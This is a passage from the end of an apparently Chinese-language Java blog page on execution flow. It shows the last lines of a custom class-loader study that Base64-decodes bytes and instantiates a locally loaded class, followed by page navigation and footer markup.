<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#C678DD;">            byte</span><span style="--shiki-light:#E45649;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;">decodedData</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> base64Decoder</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">decode</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(byteArray);</span></span>
<span class="line"><span style="--shiki-light:#A0A1A7;--shiki-light-font-style:italic;--shiki-dark:#7F848E;--shiki-dark-font-style:italic;">            // 进行Base64解码</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">            return</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> decodedData;</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">        } </span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">catch</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> (</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">IOException</span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;"> e</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">) {</span></span>
<span class="line"><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;">            e</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">printStackTrace</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">        }</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">        return</span><span style="--shiki-light:#986801;--shiki-dark:#D19A66;"> null</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">;</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">    }</span></span>
<span class="line"><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;">    public</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> static</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> void</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> main</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">String</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">[] </span><span style="--shiki-light:#383A42;--shiki-light-font-style:inherit;--shiki-dark:#E06C75;--shiki-dark-font-style:italic;">args</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">)</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> throws</span><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;"> Exception</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;"> {</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">        ClassLoaderStudy</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> loader</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#A626A4;--shiki-dark:#C678DD;"> new</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;"> ClassLoaderStudy</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">        Class</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> testClass</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> loader</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">loadClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">(</span><span style="--shiki-light:#50A14F;--shiki-dark:#98C379;">&quot;home/kali/桌面/test&quot;</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">);</span></span>
<span class="line"><span style="--shiki-light:#C18401;--shiki-dark:#E5C07B;">        Object</span><span style="--shiki-light:#E45649;--shiki-dark:#E06C75;"> o</span><span style="--shiki-light:#383A42;--shiki-dark:#56B6C2;"> =</span><span style="--shiki-light:#E45649;--shiki-dark:#E5C07B;"> testClass</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">.</span><span style="--shiki-light:#4078F2;--shiki-dark:#61AFEF;">newInstance</span><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">();</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">    }</span></span>
<span class="line"><span style="--shiki-light:#383A42;--shiki-dark:#ABB2BF;">}</span></span></code></pre><div class="line-numbers" aria-hidden="true" style="counter-reset:line-number 0;"><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div><div class="line-number"></div></div></div></div><!----><footer class="vp-page-meta"><div class="vp-meta-item edit-link"><a class="auto-link external-link vp-meta-label" href="https://github.com/vuepress-theme-hope/vuepress-theme-hope/edit/main/src/开发/Java开发/JAVA执行流程.md" aria-label="在 GitHub 上编辑此页" rel="noopener noreferrer" target="_blank"><!--[--><svg xmlns="http://www.w3.org/2000/svg" class="icon edit-icon" viewBox="0 0 1024 1024" fill="currentColor" aria-label="edit icon" name="edit"><path d="M430.818 653.65a60.46 60.46 0 0 1-50.96-93.281l71.69-114.012 7.773-10.365L816.038 80.138A60.46 60.46 0 0 1 859.225 62a60.46 60.46 0 0 1 43.186 18.138l43.186 43.186a60.46 60.46 0 0 1 0 86.373L588.879 565.55l-8.637 8.637-117.466 68.234a60.46 60.46 0 0 1-31.958 11.229z"></path><path d="M728.802 962H252.891A190.883 190.883 0 0 1 62.008 771.98V296.934a190.883 190.883 0 0 1 190.883-192.61h267.754a60.46 60.46 0 0 1 0 120.92H252.891a69.962 69.962 0 0 0-69.098 69.099V771.98a69.962 69.962 0 0 0 69.098 69.098h475.911A69.962 69.962 0 0 0 797.9 771.98V503.363a60.46 60.46 0 1 1 120.922 0V771.98A190.883 190.883 0 0 1 728.802 962z"></path></svg><!--]-->在 GitHub 上编辑此页<!----></a></div><div class="vp-meta-item git-info"><!----><!----></div></footer><nav class="vp-page-nav"><a class="route-link auto-link prev" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E6%95%B0%E6%8D%AE%E5%BA%93/" aria-label="Java数据库"><div class="hint"><span class="arrow start"></span>上一页</div><div class="link"><!---->Java数据库</div></a><a class="route-link auto-link next" href="/TvT-dog/%E5%BC%80%E5%8F%91/Java%E5%BC%80%E5%8F%91/Java%E4%B8%AD%E7%9A%84Grpc.html" aria-label="Java中的Grpc"><div class="hint">下一页<span class="arrow end"></span></div><div class="link">Java中的Grpc<!----></div></a></nav><!----><!----><!--]--></main><!--]--><footer class="vp-footer-wrapper" vp-footer><div class="vp-footer">默认页脚</div><div class="vp-copyright">Copyright © 2024 Ho1d_F0rward </div></footer></div><!--]--><!--[--><!----><!--[--><!--]--><!--]--><!--]--></div>
    <script type="module" src="/TvT-dog/assets/app--ZYjmNcq.js" defer></script>
  </body>
</html>
